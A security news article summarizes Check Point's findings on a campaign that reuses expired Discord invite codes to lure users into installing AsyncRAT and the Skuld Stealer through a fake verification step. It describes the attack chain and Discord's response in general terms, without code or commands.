A recent malware campaign has exploited a vulnerability in Discord’s invitation system to distribute a data stealer named Skuld and the AsyncRAT remote access trojan.
According to a technical report by Check Point, attackers manipulated vanity link registrations to redirect users from legitimate sources to malicious servers. This tactic involved using the ClickFix phishing method, multi-stage loaders, and time-based evasions to deliver AsyncRAT and a customized Skuld Stealer aimed at crypto wallets.
The issue with Discord’s invite system lies in its susceptibility to attackers hijacking expired or deleted invite links to redirect users to malicious servers. This means that previously trusted invite links shared on forums or social media could lead users to harmful sites unknowingly.
Check Point’s findings come shortly after uncovering a phishing campaign that used expired vanity invite links to lure users into joining a Discord server, prompting them to visit a phishing site to verify ownership, resulting in their digital assets being stolen.
While Discord allows users to create temporary, permanent, or custom (vanity) invite links, Check Point discovered that creating custom links enables the reuse of expired or deleted invite codes, potentially allowing attackers to claim them for their malicious servers.
The ability to reuse expired or deleted Discord invite codes for custom vanity links poses a significant risk, as unsuspecting users following previously trusted links could be redirected to fake Discord servers controlled by threat actors.
The attack involves seizing control of invite links from legitimate communities and redirecting users to malicious servers, where they are prompted to complete a verification step by authorizing a bot, leading them to a fake website with a “Verify” button.
By incorporating the ClickFix social engineering tactic, attackers trick users into infecting their systems under the guise of verification. Subsequently, users unknowingly download a PowerShell script that initiates a chain of events ultimately resulting in the deployment of AsyncRAT and Skuld Stealer.
AsyncRAT leverages a dead drop resolver technique to access the command-and-control server, while Skuld is an information stealer capable of extracting data from Discord, browsers, crypto wallets, and gaming platforms, including crypto wallet seed phrases and passwords.
The attack also utilizes a custom version of ChromeKatz to bypass Chrome’s encryption protections, with data being exfiltrated to the attackers via a Discord webhook, allowing them to blend in with normal traffic.
Discord has taken action by disabling the malicious bot, disrupting the attack chain. Check Point also identified another campaign by the same threat actor distributing a modified hacktool for unlocking pirated games, hosted on Bitbucket and downloaded 350 times.
The victims of these campaigns are primarily located in the US, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the UK. This incident underscores how cybercriminals exploit Discord’s features, such as the reuse of expired invite codes, to launch sophisticated attacks targeting cryptocurrency users for financial gain.
If you found this article informative, follow us on Twitter and LinkedIn for more exclusive content.
